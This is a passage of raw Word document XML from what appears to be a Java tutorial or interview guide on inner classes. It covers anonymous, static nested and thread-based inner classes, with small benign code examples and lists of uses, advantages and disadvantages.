      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A280E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DB1AB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p>
    <w:p w14:paraId="6411EB1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1E74ECF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lastRenderedPageBreak/>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6B43D4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BA00D2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5624B59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5957D67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7567BE" w14:textId="19E93DBD"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016376E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onymous Inner Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD64D5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xml:space="preserve"> is a type of inner class that doesn’t have a name. It is used to instantiate classes that extend other classes or implement interfaces directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D830F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interface</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DDA3D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p>
    <w:p w14:paraId="286AE1D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p>
    <w:p w14:paraId="2765ADF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CEFE6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024E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58DF84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greeting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nonymous inner class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5279E10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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BBB13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389C69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Hello from the anonymous class!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1793AF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7B126A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225977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greeting</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>greet</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773050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42A519F" w14:textId="72AC9E5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33EF9E0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Nested Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F7DA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a static inner class that doesn’t require an instance of the outer class to be instantiated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677E77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0F7ED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static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Static Variable"</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224F66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5B2C1DD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6826E9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4DA7A3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static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staticVariable</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C90640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A595F2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1A3CDA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p>
    <w:p w14:paraId="041671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6C163E3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C5DD88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7484F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neste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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C27F54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nested</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3FA7D8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FCFC41A" w14:textId="0CC09F66"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1EE1D2D1"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of Inner Classes in Projects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58614F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inner classes are widely used in real-world projects. Here are a few use cases where I’ve utilized inner classes in projects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283B7393"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in GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes are commonly used for event handling, particularly with GUIs (like Swing). Anonymous inner classes are used to implement event listener interfaces directly within methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCD9750"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addActionListener(new ActionListener() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6932816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519BF04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665D26F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D79ED"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2B2D8D"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ng Helper Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a helper class is only used within the outer class, defining it as an inner class improves encapsulation. This allows it to access private members of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F3365"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Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes can implement iterators within the class they are iterating over. It provides a clean way to manage the iteration over data in the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E373E0"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ing Outer Class Members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sometimes, inner classes are used to define and run threads that need to interact with the outer class’s state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBDE3A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D2D92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messag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Hello, Thread!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE281F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159FD84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w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</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0394B4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run</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109A5B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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>message</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ccessing outer class variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A26CC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D70AF8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0A9CB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2D2B0E0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tartThread</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7C6959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threa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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486664C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thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B35F23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19B364D" w14:textId="6CC6D223"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51B0FB96"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Inner Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB090F9"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Inner classes help to logically group classes together, making the code more organized and reducing potential conflicts with other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B64E03"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o Outer Class Members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes have direct access to all members (including private members) of the outer class, which simplifies implementation when the inner class needs to interact closely with the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DBB3B6"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and Callbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes are often used in event-driven programming, especially with GUI frameworks (Swing, JavaFX) where you can define event listeners or callbacks directly within the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A392B"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sadvantages of Inner Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFD767"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d Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Too many inner classes in a class can make the code harder to understand and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB74768"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Inner classes are tightly coupled with their outer class, meaning they cannot be reused in other contexts without also involving the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B5B70"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D2FBEDE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">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ner classes are a powerful tool in Java, allowing you to group logically related classes together and access the outer class's members. However, they should be used judiciously to avoid unnecessary</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complexity in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F1D061" w14:textId="13355BB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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A69232B" w14:textId="73FE6A66" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00A2479C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc197867267"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the purpose of inner class</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="745A50B1" w14:textId="13A311F9" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">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 of an Inner Class in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D6800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capsulation and Logical Grouping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2BBDD5"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llow for better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by grouping classes together that are closely related. This makes the code easier to maintain, understand, and modify.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E612F"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elps in keeping the inner class hidden from other parts of the program where it is not needed, thereby improving the structure of the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04830286"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28A6072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Out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046C3DE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rivate</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> name </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008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Outer"</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E9FC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45937FBC"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Inn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6983A38"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ublic</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> prin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58FE57E6"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Accessing private member of outer class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307EFF6D"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1319CF84"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A4D5513" w14:textId="60A61FC1"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00115EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F82A43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Access to Outer Class Members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E3A03D"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classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> have direct access to the outer class’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>private fields and methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is useful when the inner class needs to manipulate or interact with the outer class's state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1487032E"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neficial when there is a tight coupling between the inner and outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A91A5FA"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6B23794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Out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AF13F7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rivate</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> message </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008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Hello from outer class!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241D6106"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161FE9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Inn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13AFD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ublic</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> prin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2F0975FE"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Accessing outer class's private member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19006E90"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09E4342"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37B647E" w14:textId="1AAB24C4"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F6AA0"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vent Handling and Callback Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A604E"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commonly used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven programming</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Sw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JavaFX</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for GUI applications) to define event listeners or callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BD648F"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often used to implement interfaces or extend classes for event handling, which helps in keeping event handling logic within the context of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC77BB8"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6711B8B6"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button</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>addActionListener</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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ActionListene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DE808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actionPerformed</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
